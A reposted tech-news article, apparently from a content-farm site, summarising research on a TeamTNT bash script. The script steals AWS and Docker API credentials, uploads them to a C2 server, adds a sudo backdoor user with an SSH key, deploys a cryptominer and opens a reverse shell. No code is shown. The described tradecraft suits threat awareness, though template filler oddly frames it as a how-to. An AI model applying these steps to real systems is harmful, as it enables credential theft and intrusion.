Shulou(Shulou.com)05/31 Report--

This article mainly introduces "malicious shell script stealing AWS, Docker credential analysis". In daily operation, I believe that many people have doubts about malicious shell script stealing AWS and Docker credential analysis. The editor consulted all kinds of data and sorted out simple and easy-to-use methods of operation. I hope it will be helpful to answer the doubts of "malicious shell script stealing AWS, Docker credential analysis". Next, please follow the editor to study!

Researchers recently found an attack that uses shell scripts to perform malicious activities. Based on previous attacks, these malicious scripts are mainly used to deploy cryptocurrency miners. But in recent attacks, there are other purposes besides being used in cryptocurrency excavator downloaders. From the C2 URL, strings, encryption keys, and languages used in the sample, the researchers inferred that the latest attack activity came from TeamTNT.

The malicious shell script was developed in the bash language. Compared with similar attacks, the code in the sample is well styled and organized according to descriptive function names:

Figure 1. A code snippet indicating the function of a function

The first function called by the Shell script is to prepare the environment to ensure the resources needed for the next phase, attacks, computer power, and so on. In addition, the existence of a security solution is checked.

The Shell script also downloads some gray tools for the next attack. These tools perform network scanning and mapping to retrieve and map vulnerable container API.

Once the environment is set up, the shell script retrieves sensitive information, gets a copy of that information, and uploads it to the C2 server.

Figure 2. Code snippet for stealing AWS credentials

In the previously found samples of stolen AWS credentials, only the existence of confidential files is checked and uploaded. In the new sample, developers have added 2 new paths. One is to request the AWS metadata service and try to get credentials from it. The other is to check the environment variable of the AWS credential and, if it exists, upload it to the C2 server. In addition, the new sample steals not only AWS credentials, but also Docker API credentials.

Figure 3. Code snippet for stealing Docker API credentials

In between stealing credentials and deploying a cryptocurrency miner, the script also releases another base64-encoded sample. This is to create sudo-authorized users on the system and use SSH-RSA keys to ensure that they can connect to the infected machine and maintain access.

Figure 4. Indicates the code snippet created by the user

Then download, deploy and execute the cryptocurrency miner. The last step recently added to this attack is the deployment of reverse shell.

So far, this attack mainly attacks the container platform. Recently, more than 2000 container images with malicious samples have been downloaded.

Figure 5. Screenshot of container image containing malicious samples

At this point, the study on "malicious shell script stealing AWS, Docker credential analysis" is over. I hope to be able to solve everyone's doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.